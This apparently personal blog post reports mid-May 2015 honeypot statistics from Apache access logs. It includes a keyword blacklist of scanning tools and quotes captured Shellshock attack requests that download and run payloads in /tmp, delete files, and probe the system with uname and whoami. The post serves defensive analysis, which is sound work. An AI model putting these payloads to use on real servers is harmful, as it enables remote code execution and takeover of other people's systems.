Montag, 18. Mai 2015

Mid May Report

Mid-May Honeypot report.
Today I will realease some statistics of my Honeypot. The data is fetched using my apache analyzer script in newest version. Source data are all access log starting with 18 April until today.

~/$ python -s /home/jstephan/MidMay.log -l -i 0 -f MidMay
extended Blacklist: Wget|Python|sqlmap|curl|apach0day|pma|php|connect|wordpress|wp|zmeu|masscan|morfeus
extended Whitelist:|::1
Logged 25 Lines of bad headers
Logged 351 Lines of possible injections
Logged 16 Lines of strange headers
 If you want to do some research on your own: Here is the source document (GoogleDrive)

 Overall statistics

CountryCode overview


The favorite tool to scan a Apache servers still seems to be masscan
masscan/1.0 (


This are still my favorite, as you get so much out of it, you see a nice URL and you get some malware you can analyze, pure fun :-)

 Some examples:

Perl based: - - [02/May/2015:21:14:22 +0200] "GET / HTTP/1.1" 404 412 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget -O /tmp/;curl -O /tmp/;perl /tmp/;rm -rf /tmp/*\");'"

other: - - [12/May/2015:01:31:28 +0200] "GET /cgi-bin/ HTTP/1.0" 408 519 "() { :; }; /usr/bin/wget -qO -`uname`-`uname -p`-`whoami`-`wget -U curl -qO-`" "() { :; }; /usr/bin/wget -qO -`uname`-`uname -p`-`whoami`-`wget -U curl -qO-`"
 ChinaZ: - - [20/Apr/2015:22:59:37 +0200] "GET / HTTP/1.1" 404 442 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget -O /tmp/China.Z-taar >> /tmp/;echo echo By China.Z >> /tmp/;echo chmod 777 /tmp/China.Z-taar >> /tmp/;echo /tmp/China.Z-taar >> /tmp/;echo rm -rf /tmp/ >> /tmp/;chmod 777 /tmp/;/tmp/\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget -O /tmp/China.Z-taar >> /tmp/;echo echo By China.Z >> /tmp/;echo chmod 777 /tmp/China.Z-taar >> /tmp/;echo /tmp/China.Z-taar >> /tmp/;echo rm -rf /tmp/ >> /tmp/;chmod 777 /tmp/;/tmp/\""

Length of request

I have one check which check the request length. I used a hardcoded size to detect this. Normally nothing good comes from a log request.
  • PHP encoded - means hereby that the url was encoded, please see an older blogpost which explains this sort of attack here
  • Wordpress direct - means that this was a direct request against a admin page or such
  • connect - means the connect statements I described in an older blogpost here